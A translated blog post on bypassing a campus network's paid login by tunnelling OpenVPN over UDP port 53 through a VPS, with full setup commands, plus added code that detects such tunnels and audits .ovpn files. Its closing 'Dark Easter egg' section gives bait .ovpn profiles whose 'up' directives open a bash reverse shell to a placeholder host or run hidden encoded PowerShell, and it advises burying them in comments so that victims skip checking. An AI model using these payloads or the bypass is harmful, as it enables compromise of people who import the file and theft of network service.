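This article was published 1744 days ago; some of its content may have changed since. If in doubt, ask the author.

Last semester I quietly set up a VPS and got around the campus network through UDP port 53, so I no longer had to pay the school. But I got lazy at the time and used a one-click script that someone else provided.

Then yesterday I took a casual look at that VPS, and whoa, a dozen or so CVEs...

[Screenshot]

What were they up to... Goodbye and good riddance. So I reinstalled the VPS's operating system.

And so the story begins.

PS: this article has been corrected several times, so enjoy without worry ( ﹁ ﹁ ) ~→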

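Brief introduction and approach

For various reasons, many people simply assume a VPN exists specifically for xx, when that is only one of its uses. Many people also lump those "scientific" proxy tools (酸酸乳 and the like) together with the concept of a VPN, which is wrong. Work out the exact difference yourself.

I suggest reading this article first. (The link seems to be dead by now, 2333)

As for the principle: a network authentication setup like the school's establishes contact with your machine before you even reach the login page. Some router records your computer's MAC address and checks it against its MAC-to-IP mapping table; if the MAC is not there, it adds a routing record. So before you authenticate you should already have been assigned an IP address, which is what lets you reach the authentication page (at this point your computer and the router acting as gateway are already on the same internal network, so the authentication service on that network is naturally reachable). In other words, your machine can already talk directly to the router (that is, a gateway) before it has authenticated.

The reason you cannot get online without entering a username and password is that, until you do, firewall rules block the corresponding traffic. These rules generally leave out UDP port 53 (because it has to stay open for the DNS server), so the firewall does not block it even if you never fill in the login page. Hence the possibility of a bypass. You may ask why UDP ports 67, 68 and 69 (ports related to DHCP) and so on are not open; I don't know, but it probably has to do with the school's authentication mechanism.

[Screenshot 2]

As the screenshot above shows, UDP port 53 is in the filtered state, but at least it responds... (UDP 1103 also appears to be open; could that port be used for a bypass too? Explore that yourself, hhh)

PS: I just remembered someone saying that changing your MAC address lets you evade tracking. It doesn't really help. Each time a packet passes a gateway, the old MAC information in the header is discarded and replaced by the gateway's MAC, which means your MAC address is not exposed that easily, and changing it is just one more small layer of insurance. As long as someone can find the routing information on your first gateway, they can pretty much locate you reliably.

Now we know why a bypass is possible; how do we do it? Simple: intranet penetration is enough. FRP and similar tools all work, and even a self-written communication script should be able to go through UDP 53 without being noticed. Also, it actually works without the UDP 53 penetration method too: a DNS tunnel (I tried it in the second semester of my first year) gets through, but throughput is a pitiful 30K or so (this approach is fiddly and loses a lot of packets, so I dropped it).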
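From the network operator's side, traffic like this is distinguishable from DNS, because a tunnel on UDP 53 does not carry DNS messages. The following is an added example, not code from the original post: it checks whether a UDP/53 payload parses as a well-formed DNS query and flags payloads whose first byte carries an OpenVPN client-reset opcode. The function names and sample payloads are constructed for illustration.

```python
import struct

# OpenVPN keeps its opcode in the high 5 bits of the first payload byte.
OVPN_CLIENT_RESET = {1, 7, 10}   # P_CONTROL_HARD_RESET_CLIENT_V1 / V2 / V3

def parse_dns_query(payload):
    """Return the queried name if payload is a well-formed DNS query, else None."""
    if len(payload) < 17:               # 12-byte header + root name + type/class
        return None
    _id, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    if flags & 0x8000 or flags & 0x7800 or flags & 0x0040:
        return None                     # must be QR=0, opcode 0 (QUERY), Z=0
    if qd != 1 or an or ns or ar > 1:   # one question, at most one EDNS OPT record
        return None
    labels, pos = [], 12
    while pos < len(payload):
        n = payload[pos]
        pos += 1
        if n == 0:                      # root label ends the name
            if pos + 4 > len(payload) or sum(len(l) + 1 for l in labels) > 254:
                return None
            return ".".join(labels) or "."
        if n > 63 or pos + n > len(payload):
            return None                 # label too long, or runs past the datagram
        labels.append(payload[pos:pos + n].decode("ascii", "replace"))
        pos += n
    return None

def classify_udp53(payload):
    """Label one UDP/53 payload sent by a client towards a server."""
    name = parse_dns_query(payload)
    if name is not None:
        return "dns-query:" + name
    if len(payload) >= 14 and payload[0] >> 3 in OVPN_CLIENT_RESET:
        return "openvpn-handshake"
    return "non-dns"

# Constructed sample payloads (not captured traffic).
DNS_QUERY = (struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
             + b"\x07example\x03com\x00" + struct.pack("!2H", 1, 1))
OVPN_RESET = b"\x38" + bytes(range(1, 42))   # opcode 7, key id 0, filler bytes
OPAQUE = b"\x48" + b"\xaa" * 30              # opcode 9 (P_DATA_V2), filler bytes

if __name__ == "__main__":
    for pkt in (DNS_QUERY, OVPN_RESET, OPAQUE):
        print(classify_udp53(pkt))
```

A DNS tunnel of the kind mentioned above produces well-formed queries and passes this check, so it has to be caught by query volume and name length instead; allowing pre-authentication UDP 53 only to the portal's own resolver removes the direct path altogether.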

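Here I use the open-source OpenVPN to build a tunnel; personally I think OpenVPN is a powerful networking tool.

Some may wonder about speed. From what I have observed, the main limiting factor is your own VPS's bandwidth. I bought an Alibaba Cloud student instance for about 10 yuan a month (up to 1000G per month; I typically use about 4% of it), which peaks at 600+ K/s. Watching 720p video on Bilibili at 1.5x speed almost never stutters (1080p doesn't stutter either, actually).

Next, the steps for doing this over UDP port 53.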

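Setting up the server

First you need a VPS, preferably one geographically close to the school (to reduce latency?).

I first tried running an OpenVPN server in Docker. I could reach Docker's internal network, but could not reach external sites through it, so I gave up on that approach in the end (thinking about it now, the routing inside was probably just not configured properly).

The working steps below are based on CentOS 7.3. Most of the commands are taken from this article.

a. Generate the key pair

cd /root
wget https://codeload.github.com/OpenVPN/easy-rsa-old/zip/master
mv master easy-rsa-old-master.zip
unzip -d /usr/local/ easy-rsa-old-master.zip
cd /usr/local/easy-rsa-old-master/easy-rsa/2.0/
ln -s openssl-1.0.0.cnf openssl.cnf
vi vars # edit the relevant fields first if you like
source vars
./clean-all
./build-ca # I just pressed Enter all the way through, plus two "yes" answers
./build-key-server server
./build-key client
./build-dh

OpenVPN's communication encryption is based on such a key pair. Next, install OpenVPN.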

b. Compile and install OpenVPN

cd /root
wget https://swupdate.openvpn.org/community/releases/openvpn-2.4.4.tar.gz
yum install -y lzo lzo-devel openssl openssl-devel pam pam-devel net-tools git lz4-devel
tar xf /root/openvpn-2.4.4.tar.gz -C /usr/src/
cd /usr/src/openvpn-2.4.4
./configure --prefix=/usr/local/openvpn
make
make install

Troubleshoot any errors yourself. Also, OpenVPN 2.4.6 or later is recommended; versions that are too old carry some risk. Newer versions have their own annoyances though, mainly problems with the iPad client (2.4.10, for example, fails; other versions are unknown, but 2.4.4 works).

c. Configure the server

mkdir -p /etc/openvpn        # OpenVPN configuration directory
mkdir -p /etc/openvpn/pki # where the OpenVPN certificates are stored
/usr/local/openvpn/sbin/openvpn --genkey --secret ta.key
mv ./ta.key /etc/openvpn/pki
cp /usr/local/easy-rsa-old-master/easy-rsa/2.0/keys/{ca.key,ca.crt,server.crt,server.key,dh2048.pem} /etc/openvpn/pki/
cp /usr/src/openvpn-2.4.4/sample/sample-config-files/server.conf /etc/openvpn/

d. Files and routing configuration

Note that from this part on the steps differ from that blog post; you can try that post's configuration to see what effect it has.

Edit the server configuration file /etc/openvpn/server.conf

port 53
proto udp
dev tun

ca /etc/openvpn/pki/ca.crt
cert /etc/openvpn/pki/server.crt
key /etc/openvpn/pki/server.key # This file should be kept secret
dh /etc/openvpn/pki/dh2048.pem

server 10.8.0.0 255.255.255.0 # virtual LAN subnet assigned to clients

;ifconfig-pool-persist ipp.txt

;push "route 10.0.0.0 255.0.0.0"
;push "route 192.168.8.0 255.255.255.0" # with these two lines you can connect, but the IP address you connect from is exposed; I only want to reach sites with the VPS's IP
push "redirect-gateway def1"
# The line above sends all of your local traffic through the OpenVPN server (the VPS), but that leaves the client unable to reach IP addresses on its previous LAN, and even dual-NIC machines run into problems
# This is because it modifies the routing table. If you want the client to still reach IP addresses on its previous LAN, on Windows you can add a route before running OpenVPN, e.g. route ADD {ipaddr_youwant} MASK 255.255.255.0 {gateway_ip}
# {gateway_ip} can be found with netstat -nr before the client connects to OpenVPN; for this issue see https://www.thinbug.com/q/16302138

push "dhcp-option DNS 8.8.8.8"
client-to-client
duplicate-cn # multiple clients may use the same account
keepalive 10 120

tls-auth /etc/openvpn/pki/ta.key 0 # This file is secret
cipher AES-256-CBC
comp-lzo
max-clients 50

user nobody
group nobody

persist-key
persist-tun

status /var/log/openvpn-status.log
log /var/log/openvpn.log
log-append /var/log/openvpn.log

verb 3

# plugin /usr/lib64/openvpn/plugin/lib/openvpn-auth-ldap.so "/etc/openvpn/auth/ldap.conf cn=*"
# client-cert-not-required

If any of the settings above are unclear, look up what they do yourself; I'm too much of a novice to make claims.

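Then enable kernel IP forwarding:

echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
sysctl -p

Configure the iptables policy (note: these rules may well disappear after the VPS reboots. If after a reboot you can connect to the VPN but cannot reach any website, the problem is very likely here):

systemctl enable iptables
systemctl start iptables
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j SNAT --to-source 172.24.47.200
iptables-save > /etc/sysconfig/iptables
service iptables restart

Here 172.24.47.200 is the IP address of eth0 as shown by ifconfig. If you still cannot reach external networks once the VPN is up, and other causes are ruled out, the mistake is almost certainly in this configuration.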

Create the systemd unit file for OpenVPN, that is, create /usr/lib/systemd/system/openvpn.service

[Unit]
Description=openvpn
After=network.target

[Service]
EnvironmentFile=-/etc/openvpn/openvpn
ExecStart=/usr/local/openvpn/sbin/openvpn --config /etc/openvpn/server.conf
Restart=on-failure
Type=simple
LimitNOFILE=65536

[Install]
WantedBy=multi-user.target

Start it and enable it at boot:

systemctl start openvpn
systemctl enable openvpn

At this point the server configuration is finished. Confirm that the VPS's firewall allows the corresponding port, then run OpenVPN with: service openvpn start.

Next comes the local client configuration.

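Client configuration

After installing the client (installation is easy, so I won't go into it), create the client configuration file client.ovpn in the config directory under the installation directory, with the following content:

client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
resolv-retry infinite
nobind
persist-key
persist-tun

ca ca.crt
cert client.crt
key client.key
remote-cert-tls server
tls-auth ta.key 1
cipher AES-256-CBC

comp-lzo
verb 3

From the two directories /usr/local/easy-rsa-old-master/easy-rsa/2.0/keys and /etc/openvpn/pki, find and download the previously generated ca.crt, client.crt, client.key and ta.key, and put them in the same directory as client.ovpn. At this point it actually already works.

Sometimes, though, handing out this many files to other people is a hassle. In that case we can merge them so that everything becomes a single configuration file, client-allinone.ovpn, in the following format (sanitized, so don't get any ideas~):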

client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
resolv-retry infinite
nobind
persist-key
persist-tun

<ca>
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
</key>
remote-cert-tls server
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
...
-----END OpenVPN Static key V1-----
</tls-auth>
cipher AES-256-CBC

comp-lzo
verb 3

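Testing shows that when visiting other sites or services the IP address has become the VPS's address, that both the mobile and the PC OpenVPN clients work, and that multiple clients can ping each other. If you have got this far, congratulations: the network is up.

This method gets you free traffic at school!!! The local machine can connect to the VPN directly without logging in to the authentication system. The traffic then joins the local computer and the VPS into one network over UDP port 53, and once that succeeds communication continues over UDP 53, so subsequent traffic naturally does not need to be paid for. If that is still not secure enough for you, you can go further: use the firewall to restrict the IP addresses allowed to log in to the VPN, use rules to limit the number of VPN clients, configure IPSec rules for additional protection, and so on.

To stress the point: keep the ovpn configuration file safe, do not leak it, and preferably do not network with strangers' machines.

Also, if you need to change UDP to TCP (which means the campus network bypass no longer gives free traffic), only small changes to the configuration file client-allinone.ovpn are needed: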

  • Change proto udp to proto tcp

  • Change remote xxx.xxx.xxx.xxx 53 to remote xxx.xxx.xxx.xxx {tcp_port}

  • Change <tls-auth> to <tls-crypt>

  • Change </tls-auth> to </tls-crypt>

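Also, if you need username/password login (for convenience or for better security), or have multiple users (doing multi-user directly with key-file authentication easily forces a service restart because of route conflicts on the VPS side), space is limited here, so see this article.

Building on that reference article, adding the two lines auth-user-pass and auth-nocache to the single configuration file client-allinone.ovpn makes it prompt for account authentication.

Also, OpenVPN can perfectly well run an IPv6 tunnel (as long as you have a public IPv6 address), which should also give free traffic; again, the speed limit is the VPS's bandwidth. This site offers a way to obtain an IPv6 address for your own IPv4 host, but I did not succeed with it. Unless there is some other way to get it for free, this approach is not economical enough.

PS: the purpose of the steps above is actually not just to bypass the campus network; the title is only a gimmick. On the one hand it can serve as a nested layer of disguise, and on the other it networks your machines directly, avoiding other, less trustworthy intranet-penetration methods. Networking this way also lets you gather all your devices into one internal network. Configure a few services on top and a single phone can fairly safely control several computers, with plenty of ways to play: you can even access your dorm virtual machine's desktop from your phone, query your own social-engineering database, run scripts remotely, pass files back and forth...

I feel my current writing ability still falls a bit short for this article; apologies. If there are mistakes or anything unclear, just leave a comment.

I also consulted several articles: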

https://www.cnblogs.com/fjping0606/p/6601234.html

https://www.jianshu.com/p/a9b670200428

https://www.centos.bz/2016/10/establish-a-tunnel-with-openvpn/

https://blog.sorz.org/p/openvpn-traversal/

http://blog.joylau.cn/2020/05/28/OpenVPN-Config/

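Dark Easter egg

This part has little to do with the above; it mainly covers how an ovpn file can be used to get a reverse shell.

Untrusted ovpn files are in fact very dangerous, and this can be used as bait: someone eager to break in gets hold of your ovpn file, wants to connect straight into your internal network, skips checking the file, and gets turned on instead.

Constructing a malicious ovpn file is very simple. For example, against Linux:

client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
script-security 2
up "/bin/bash -c '/bin/bash -i >& /dev/tcp/{malicious_ip}/{port} 0<&1 2>&1'"
...

And of course against Windows:
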
client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
script-security 2
setenv k0 {malicious_powershell_base64_divided}
setenv k1 {malicious_powershell_base64_divided}
setenv k2 {malicious_powershell_base64_divided}
setenv k3 {malicious_powershell_base64_divided}
setenv kk 'start /min /b powershell /w hidden /enc %k0%%k1%%k2%%k3%'
up 'C:\\Windows\\System32\\cmd.exe /c "(%kk%)|cmd"'
verb 0

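Ideally this is combined with all sorts of comments so that the other party has no patience to check the file; they end up executing it, and may notice something odd, but by then it is too late.

Reference article on weaponizing the script: https://forum.90sec.com/t/topic/1289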
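Both profiles above depend on script-security 2 plus a directive that makes OpenVPN run a command, so a received profile can be screened before it is ever imported. The following is an added example, not code from the original post: audit_ovpn is a hypothetical helper that reports such directives with their line numbers and ignores inline key blocks and comment padding. The sample profile, its address and its command are constructed placeholders.

```python
import shlex

# Directives that make OpenVPN run an external command or load a shared object.
EXEC_DIRECTIVES = {"up", "down", "ipchange", "route-up", "route-pre-down",
                   "tls-verify", "auth-user-pass-verify", "client-connect",
                   "client-disconnect", "learn-address", "plugin"}

def audit_ovpn(text):
    """Return (line_no, directive, reason) findings for an OpenVPN profile."""
    findings, inline = [], None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if inline:                      # inside <ca>...</ca> etc.: key material
            if line == f"</{inline}>":
                inline = None
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("<") and line.endswith(">") and line[1] != "/":
            inline = line[1:-1]
            continue
        try:
            words = shlex.split(line, comments=True)
        except ValueError:              # unbalanced quotes: plain split instead
            words = line.split()
        name, args = words[0].lstrip("-"), words[1:]
        if name in EXEC_DIRECTIVES:
            findings.append((no, name, "runs: " + " ".join(args)))
        elif name == "script-security" and args and args[0].isdigit() and int(args[0]) >= 2:
            findings.append((no, name, "allows user-defined scripts"))
        elif name == "setenv" and len(args) == 2 and len(args[1]) > 64:
            findings.append((no, name, "long value, possible staged data"))
    return findings

# Constructed sample profile; the address and the command are placeholders.
SAMPLE = """\
client
remote 192.0.2.10 53
script-security 2
up "/bin/sh -c 'echo constructed-sample'"
<ca>
up inside-an-inline-block-is-ignored
</ca>
verb 0
"""

if __name__ == "__main__":
    for finding in audit_ovpn(SAMPLE):
        print(finding)
```

A profile that only needs to connect to a server has no reason to contain any of these directives, so any finding is grounds to reject the file or read it line by line before use.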